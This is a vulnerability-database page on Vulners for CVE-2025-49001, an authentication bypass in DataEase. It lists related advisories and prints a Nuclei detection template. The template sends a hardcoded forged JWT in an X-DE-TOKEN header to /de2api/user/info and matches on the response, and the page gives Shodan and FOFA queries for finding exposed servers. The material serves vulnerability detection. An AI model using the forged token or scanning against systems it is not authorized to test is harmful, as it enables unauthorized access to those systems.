| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-49001 | 4 Jun 202500:36 | – | circl | |
| DataEase 授权问题漏洞 | 3 Jun 202500:00 | – | cnnvd | |
| CVE-2025-49001 | 3 Jun 202520:33 | – | cve | |
| CVE-2025-49001 Dataease Authentication Bypass Vulnerability | 3 Jun 202520:33 | – | cvelist | |
| EUVD-2025-16789 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-49001 | 3 Jun 202521:15 | – | nvd | |
| CVE-2025-49001 Dataease Authentication Bypass Vulnerability | 3 Jun 202520:33 | – | osv | |
| PT-2025-23670 · Dataease · Dataease | 3 Jun 202500:00 | – | ptsecurity | |
| CVE-2025-49001 | 5 Jun 202521:18 | – | redhatcve | |
| CVE-2025-49001 Dataease Authentication Bypass Vulnerability | 3 Jun 202520:33 | – | vulnrichment |
id: CVE-2025-49001
info:
name: DataEase < 2.10.10 - JWT Authentication Bypass
author: YunSeoJo,aryu-ru
severity: critical
description: |
DataEase < 2.10.10 contains a broken authentication caused by ineffective secret verification, letting users forge JWT tokens, exploit requires no special privileges.
impact: |
Users can forge JWT tokens, potentially gaining unauthorized access to the system.
remediation: |
Update to version 2.10.10 or later.
reference:
- https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
- https://github.com/dataease/dataease
- https://nvd.nist.gov/vuln/detail/CVE-2025-49001
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-49001
cwe-id: CWE-287
epss-score: 0.19386
epss-percentile: 0.97023
metadata:
verified: true
max-request: 2
vendor: dataease
product: dataease
shodan-query: http.title:"DataEase"
fofa-query: title="DataEase"
tags: cve,cve2025,dataease,auth-bypass,jwt,unauth
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/de2api/user/info"
matchers:
- type: dsl
dsl:
- 'status_code == 401'
- 'contains(body, "token is empty")'
condition: and
internal: true
- raw:
- |
GET /de2api/user/info HTTP/1.1
Host: {{Hostname}}
X-DE-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjEsIm9pZCI6MSwiZXhwIjo5OTk5OTk5OTk5fQ.tDSRWgqgE9BTy9NDpTE0ZAI2GKxOFPllYz-jOJu635A
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
part: header
words:
- "de-gateway-flag"
- "hmacsha256"
condition: and
case-insensitive: true
- type: word
part: body
words:
- "getWriter() has already been called"
extractors:
- type: kval
part: header
kval:
- x_de_execute_version
# digest: 490a0046304402202552363adf979697131345f558dc12e2e5c9c3d64abbc73b733ea8ab150b99c4022067f627665a7334d8de5ddb51af3b9a575e0466e393d2a1391ba89ce2357a497b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation